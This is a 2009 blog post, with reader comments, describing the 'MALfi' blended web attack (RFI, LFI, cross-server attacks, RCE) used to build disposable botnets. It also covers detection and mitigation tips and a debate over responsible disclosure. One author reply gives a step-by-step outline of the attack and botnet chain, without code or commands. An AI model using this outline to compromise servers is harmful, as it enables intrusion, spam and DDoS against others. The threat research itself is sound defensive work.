 |
What's it all about, MALfi?
A blended threat currently detected on over 350,000 Websites and Internet servers, for starters. MALfi is a general, descriptive term applied to the newly emerging blended attack used by hackers and cybercriminals to compromise Websites and servers. MALfi is a combination of RFI (remote file inclusion), LFI (local file inclusion), XSA (cross server attack), and RCE (remote code execution).
One major purpose of MALfi is to establish "use once and throw away" disposable botnets for spam, phishing, dedicated denial-of-service (DDoS) attacks, and other exploits.
Conservative estimates over recent months indicate around 350,000 affected Websites and servers worldwide. My organization, HostExploit, and associated researchers have tracked 103,351 attacks, involving 2,743 unique IP addresses, with 85 countries involved in RFI scanning and 911 autonomous system numbers (ASNs -- unique identifiers for every ISP) involved.
MALfi hackers deploy RFI to compromise Websites and upload a remote user interface shell. This ensures partial to full manual (and unauthorized) control over the server. This differs from the now- familiar "drive-by" Website exploit, as it provides hackers with a ready-made arena where Internet plunder, in the form of information, controlled servers, and Websites, is exchanged or resold to cyber criminal groups.
RFI hackers continuously and automatically search for Website vulnerabilities for exploitation. Once breached, the Websites and the now-compromised, underlying servers are used for DDoS attacks and to facilitate further attacks on other targets.
The recent U.S. and Korean government attacks, for example, combined DDoS, spamming, phishing, and large-scale ID theft. Many of the attacks detected on various high-volume governmental and key servers used RFI and similar vulnerability scanning, as well as bots and scripts.
One distinction between RFI scanning and SQL injection/viruses/worms is that RFI happens continuously and affects all corners of the Internet.
There are three distinct stages of the MALfi threat:
- Remote file inclusion attack: Hacked Websites and servers are not infectious to the Web visitor and remain undetected by most AV tools, including, for example, Google's safe browsing feature. This "crack in the door" provides for the second stage.
- Doing damage: Here the compromised Websites and servers have attacker tools uploaded. These consist of both purchased and custom-written tools to conduct nefarious activities such as sending phishing emails, hosting phishing sites, sending spam, hosting malware, defacing, DDoS, and much more. XSA (Cross-server attacks), LFI (local file inclusion), and RCE (remote file inclusion) further compromise the system or other remote systems.
- Detection avoidance: Upon completion of the cybercriminal action or upon discovery of the attack, the miscreant removes their tools or causes them to self-destruct before moving on. With full control of the system, covering their tracks is accomplished easily.
With this technique there is no master server and no simple tracking. The compromised servers are controlled via various anonymous Web proxies and compromised hosts, in a totally decentralized manner. IRC (Internet relay chat) is primarily used in a cell-like communication structure to coordinate efforts and to launch vulnerability scans.
Identification of specific botnets, such as Zeus, Storm, or Cutwail, has been used to gather valuable cyber criminal intelligence, but the decentralized nature of RFI- and MALfi-based attacks requires deeper investigation and wider application of fundamental COMINT (communication intelligence) techniques. Even after being discovered, hackers using the RFI technique still have the often undetected and compromised Websites to reuse or from which to relaunch fresh attacks. The whole process begins again, with scanning for vulnerabilities via a new disposable single-use botnet.
The how, what, and where of this particular hacking technique and cybercrime business model are provided together with detailed and graphic explanations in the latest HostExploit community research report here.
— Jart Armin, Editor of RBNexploit.com, a watch blog on the infamous RBN (Russian Business Network), and HostExploit.com
Thinkernetter
Monday November 16, 2009 11:59:53 AM
While you never want to give away details of counterintelligence efforts, and I dont agree with releasing zero day information, or even exploits of any kind, whenever the vulnerability was announced, the fact is that the bad guys have more than enough information about this. Thinking that there is a lower level of bad guys out there who dont know the information, while accurate, is irrelevant. The bad guys already sell their most advanced malware to anyone who wants to buy it. They even sell maintenance/update services. They are also already working on their next attacks, and frankly any information you release on the current attacks drives them to modify the attacks proactively.
Thinkernetter
Monday November 16, 2009 9:30:53 AM
Hello Ira,
Obviously there is the initial question as Kurt described “informative, with enough technical spice to make it worth the read” i.e. for this particular IEv environment. I hope, as requested, I provided sufficient general detail within replies to Michael & Kurt, for example.
However, you touch on a much wider debate and I welcome the discussion, re: releasing too much data to the general community. On this wider issue within the SEC research community we are all struggling with this. As a matter of fact, the Conficker Working Group is having an internal debate just about this topic.
Mine and the view of many others is to release enough information to inform and communicate the issue to the general public. It puts the bad-guys on notice that we are on to them and their efforts. However the details and mechanics of the operation are left to a controlled and vetted audience. This way, they derive the benefit of our work, and we are aware of who now has access to the detailed research.
Many in the community seem to have shifted more toward the 'blog or data revelation for self-promotion' mindset, rather than the 'for action and attention' mindset. This is troubling to me and many others.
Although you may say “bad guys are already widely familiar with these attacks and the underlying issues” I would argue only “some of them”, and we also have a responsibility not to openly provide blueprints and data for exploitation to those others who may feel they can follow.
As you will see in the main MALfi article above this highlights our current challenge for vulnerability reporting, clearly being used as a weapon against us, in an automated form.
I hope you will agree, once again we must turn to responsible disclosure and proper release of critical information.
Thinkernetter
Sunday November 15, 2009 9:34:47 PM
I really dont understand any hesitance in posting the details. The bad guys are already widely familiar with these attacks and the underlying issues. While I dont advocate releasing zero day exploits, that's not the issue here.
IQ Crew
Sunday November 15, 2009 2:17:37 PM
Jart,
I fully understand the quandry and dillema of posting the detection methods. I also understand and comply with your system settings to limit and block functionality of un-needed services comming to and from the www server.
Thank you for additional info.
Respectfully,
Kurt
Thinkernetter
Sunday November 15, 2009 10:41:40 AM
Yes, the botnets are can be sacrificial or disposable, and still maintain the compromised servers in place until needed again.
Hence a "Use once, steal from many botnet!"
Just to add it does and should change our perspective on botnets as being some form of moribund organizational structure. Here a bad guy could raid a few servers establish a 20k botnet within a week; utilize MPack, Zeus affiliate, etc. carry out some tailor made phishing then shut down, then re-establish else where in say a week or so, for a DDoS or other badness.
All the time a variety of the servers used could be simply apparently inactive in between sorties. Just to add a variety of .gov and .edu servers were amongst those acting as attackers.
Thinkernetter
Sunday November 15, 2009 9:47:13 AM
I didn't get that from your original article. I appreciate the clarification. I also was wondering if these servers were still used and C&C servers for other botnets. It seems that they are. Are the botnets sacrificial along with the Web servers? If so that seems to imply that there are enough vulnerable Web servers to go around. Or as you mentioned the bad guys just re-infect the same ones again.
Thinkernetter
Sunday November 15, 2009 7:04:24 AM
Hi Kurt,
Must admit we all were in a quandary on this topic and report in terms of how much detail to include and for who? We are releasing a much more detailed version of the report but only available on request. The reason is this very ‘vulnerability’ issue, in fact with MALfi the bad guys use automated control panels which scan for the latest reported vulnerabilities e.g. Milw0rm, CERTs, etc. then chase down sites and servers with these.
So it depends at the time of scanning could be Apache, PHP, MSserver, Java, PDF, and so on. Without frightening anyone but for a 10 min scan on one test we could pick up around 50 latest vulnerabilities and then in just 20 mins over 4,000 web sites and servers that could be then injected, again automatically.
It has made me seriously think how much info we do give openly and freely to the bad guys, in terms of how we provide open searches for vulnerabilities and related techniques. Not sure what the answer is to this, ideas?
Detection:
(a) How we detected was to establish a special MALfi honey pot – hence the results we show just received in this.
(b) For your server / website – a simple method is to do:
- Firstly for a general understanding: do a Google search for "idxx.txt" and set for say just the last week you should see around 67.000 for this one example of compromised web sites.
- Note though, the bad guys have become cute here by changing names to say “copyright.txt” or also as “figure1.jpg”, “sample.php” etc. which become much harder to generally scan the web for
- For you and server guys / webmasters simply check directory lists for any .txt, .php, .jpg….. i.e. any file you do not recognize or have not installed. Do inurl Google checks on your domains.
- To repeat - “disallow all outbound communication from their web server that is not needed!”
Thinkernetter
Sunday November 15, 2009 5:28:19 AM
Hi Michael,
MALfi - Re: Method of Infection; think of it this way – simple steps and note mostly automated:
- Firstly establish an IRC (dark) proxies setup and establish a hacker control panel
- Auto scan for latest available vulnerabilities (Milw0rm, CERTs, etc.)
- Auto scan for websites / servers with such vulnerabilities
- From low hanging fruit or strategically useful sites / servers inject RFI
- Once inside, extend with LFI to take server and cross fertilize to other sites on server
- To infect related servers apply XSA
- Launch RCE – to infect visitors
- Turn infected visitors, now zombies, into botnet
- Control botnet via IRC proxies, and launch DDos, phishing, exploits, spam…… sell or rent botnet
- Any detection switch off XSA & RCE, still have RFI & LFI for later use
To reduce risk = yes update server and OS apps, but immediately patch known vulnerabilities. As mentioned earlier; “disallow all outbound communication from their web server that is not needed (web, DNS, etc). If said web server becomes compromised, it at least can't be used as an IRC bot”.
This is now one of the key methods the “bad guys” use to get to typical consumer and business desktops. As stated in the article around 350,000 sites & servers spotted so far, and none infected or detected by conventional means!
IQ Crew
Friday November 13, 2009 4:28:00 PM
Once again Jart rocks the internet. Excellent information, wih enough technical spice to make it worth the read. Metasploit is one of the most interesting software inventions since DOS 3.2! The only critcism I have would be you should list which vulnerabilities are being exploited to get the MALFI system uploaded. Most of what I have read seemed to indicate that The O/S is not the problem. But the applicatons running are the hole used to enter.
My real question is: If the exploit can't be detected then how are you able to identifey them unless they are activly attacking, and not in an idle wait state? This is a point to ponder before using a single server to do multiple jobs. Your Web-server and your email server and your FTP server etc. shold all be seperate systems and behind a firewall.
Thinkernetter
Friday November 13, 2009 2:37:48 PM
Hello, Jart
That was quite a post. I am sorry, I haven't read your report yet. But, I am curious about the method of infection. Does RFI scan for known vulnerabilities and exploit them. I think you hinted at that. If so, is part of the solution to make sure the Web server OS and applications are all up-to-date?
Also, I was wondering if the bad guys consider Web servers easier targets now than typical consumer and business desktops. I imagine they like the big pipes and processor power.
|
|
|
|
previous posts from Jart Armin
Is your company, or are you, being defamed on the Web? Are whistleblowers leaking your secrets? Well, call your local “cyber tracing team” -- they can fix the problem for you.
Terrorists are moving away from traditional sources of funding and relying more on money-making opportunities from cybercrime.
Wanted: Webmasters to earn around $180,000/annum, with added potential bonuses of sports cars, parties, and vacations. No experience necessary, and ethics definitely not required -- just need the ability to vend fake products and plant malware, through tried-and-trusted Web 2.0 SEO hacking methods.
IETV: the thinkerNet on film
an IBM information resource
sponsored content
big blue blog
While Google introduces its new Chrome OS (which I'm hearing will be widely available in one year? Did I mishear that?), IBM announced 10 new products today to help companies using IBM System z mainframe technology.
white papers & case studies
an IBM information resource
sponsored content
Smarter Collaboration: How to Thrive in a Challenging Business Environment
Market conditions are changing faster than ever, and organizations need to improve their agility and adaptability in order to provide better service and improve processes. The ability to work with customers, business partners, and employees as effectively as possible - while at the same time holding down costs - is a key to success.
READ THIS eBOOK
your weekly update of news, analysis, and
opinion from Internet Evolution - FREE!
REGISTER HERE
Wanted! Site Moderators
Internet Evolution is looking for a handful of readers to help moderate the message boards on our site – as well as engaging in high-IQ conversation with the industry mavens on our thinkerNet blogosphere. The job comes with various perks, bags of kudos, and GIANT bragging rights. Interested?
Please email: moderators@internetevolution.com
|
Digg
Del.icio.us
Reddit
Email This
TWEET THIS
